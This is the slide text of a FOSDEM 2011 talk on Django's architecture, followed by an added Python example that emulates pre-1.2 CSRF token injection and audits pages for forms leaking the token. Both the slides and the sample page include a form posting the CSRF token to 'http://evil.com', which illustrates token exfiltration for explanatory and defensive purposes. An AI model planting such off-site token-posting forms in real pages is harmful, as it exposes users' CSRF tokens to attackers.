
Django's Architecture: The Good, The Bad, and The Ugly

A talk I gave at FOSDEM 2011.

Andrew Godwin

October 22, 2011


  1. Django's Architecture: The Good, The Bad, & The Ugly. Andrew Godwin, FOSDEM 2011
  2. Django core committer. Mercenary programmer. Startup founder (ep.io).

  3. Django: A Brief History

  4. Initial Public Release in 2005

  5. 1.0 in 2008

  6. 1.3 in a few weeks

  7. Basic Layout

  8. contrib, core, db, dispatch, http, forms, middleware, shortcuts, templates, views

  9. contrib: admin, auth, comments, contenttypes, flatpages, gis, humanize, localflavor, messages, sessions, staticfiles, syndication
  10. core: cache, files, handlers, mail, management, serializers, servers, paginator, urlresolvers

  11. db: backends, models

  12. others: views.decorators, views.generic, csrf, test, forms.widgets, forms.fields, forms.formsets, forms.models

  13. Almost every piece of code has been changed since 2005

  14. "Good, Bad, Ugly?"

  15. Lessons from both the past and the present

  16. Some stuff here is historical (we fixed it, thankfully)

  17. There's still nasty bits (we're working on those)

  18. The Good

  19. contrib.admin

  20. admin.site.register(
          Book,
          list_display=["title", "slug"],
          prepopulated_fields={"slug": ("title", "description")},
      )
  21. The Model Layer (sometimes incorrectly called the ORM)

  22. Sensible Abstractions (sessions, caching, mail, etc.)

  23. GeoDjango (contrib.gis)

  24. from django.contrib.gis.db import models

      class Lakes(models.Model):
          name = models.CharField(max_length=100)
          rate = models.IntegerField()
          geom = models.MultiPolygonField()
          objects = models.GeoManager()

      >>> lake3 = Lakes.objects.get(id=3)
      >>> newlake.geom.contains(lake3.geom)
      True
  26. Debugging Tools (./manage.py shell, testing tools, culture)

  27. CSRF Protection (the new type)

  28. Auto-escaping

  29. View API simplicity

  30. Python

  31. MultiDB

  32. Small actual core

  33. Documentation (both the core docs and the culture)

  34. The Community

  35. Not being too high-level

  36. The Bad

  37. pre-1.2 CSRF: Would you like token leakage with that?

  38. <form action="/someview/" method="POST"> ... </form>

  39. <form action="/someview/" method="POST"> ... <input name="csrftoken" ...></form>

  40. <form action="http://evil.com" method="POST"> ... <input name="csrftoken" ...></form>

  41. Schema changes: Add a column? Oh, no, not sure we can do that.
  42. Template Implementation: Hasn't changed that much.

  43. The Ugly

  44. "Magic": It's hard to define, but you know it when you see it.
  45. Too many regular expressions: They're great until they're 100+ chars

  46. (^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*  # dot-atom
      |^"([\001-\010\013\014\016-\037!#-\[\]-\177]|\\[\001-011\013\014\016-\177])*"  # quoted-string
      )@(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,6}\.?$'  # domain

      (^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*  # dot-atom
      |^"([\001-\010\013\014\016-\037!#-\[\]-\177]|\\[\001-011\013\014\016-\177])*"  # quoted-string
      )@(?:[A-Z0-9]+(?:-*[A-Z0-9]+)*\.)+[A-Z]{2,6}$  # domain
  47. Customising Auth: Can't really touch it.

  48. {% endifnotequal %} Thankfully we fixed this in 1.2.

  49. Are there lessons to be learnt?

  50. Not everything needs fixing now: A lot of these issues have third-party solutions
  51. How do you get better? Consistency, not always writing new features, and people with too much free time.
  52. Thanks. Andrew Godwin @andrewgodwin http://aeracode.org
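The token leakage on the pre-1.2 CSRF slides (37 to 40), as an added example that is not from the talk or from Django's own code: a small emulation of a response post-processor that injects a hidden csrftoken input into every POST form, and an audit function that flags forms whose action would carry that token to another host. The site host, the sample page and the token value are constructed for the example.

```python
# Added example (not from the talk or from Django). Emulates the pre-1.2 style
# post-processor that adds a hidden token to *every* POST form, and audits the
# result for forms whose action would carry that token to another host.
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit


def inject_token_everywhere(html: str, token: str) -> str:
    """Pre-1.2 style: append the hidden field after each POST form opening tag."""
    field = f'<input type="hidden" name="csrftoken" value="{token}">'
    return re.sub(r'(<form\b[^>]*\bmethod=["\']?post["\']?[^>]*>)',
                  lambda m: m.group(1) + field, html, flags=re.IGNORECASE)


class _FormAudit(HTMLParser):
    """Tracks the enclosing form's action and records tokens that would go off-site."""

    def __init__(self, site_host: str):
        super().__init__()
        self.site_host = site_host.lower()
        self.action = None  # action of the enclosing <form>; None outside a form
        self.leaks = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.action = a.get("action") or ""
        elif tag == "input" and self.action is not None and a.get("name") == "csrftoken":
            host = urlsplit(self.action).hostname  # None for relative actions
            if host and host.lower() != self.site_host:
                self.leaks.append(self.action)

    def handle_endtag(self, tag):
        if tag == "form":
            self.action = None


def find_token_leaks(html: str, site_host: str) -> list:
    """Return the actions of forms that would send the CSRF token to another host."""
    parser = _FormAudit(site_host)
    parser.feed(html)
    return parser.leaks


# Constructed sample page (hosts and token are made up): a local form and one
# posting to another site, as on slide 40; injecting into both reproduces the leak.
SAMPLE = ('<form action="/someview/" method="POST"></form>'
          '<form action="http://evil.com" method="POST"></form>')
```

Running the audit over the injected page returns the off-site action, which is the check a template-level `{% csrf_token %}` tag (the post-1.2 approach) makes unnecessary, since the token only appears where the template author put it.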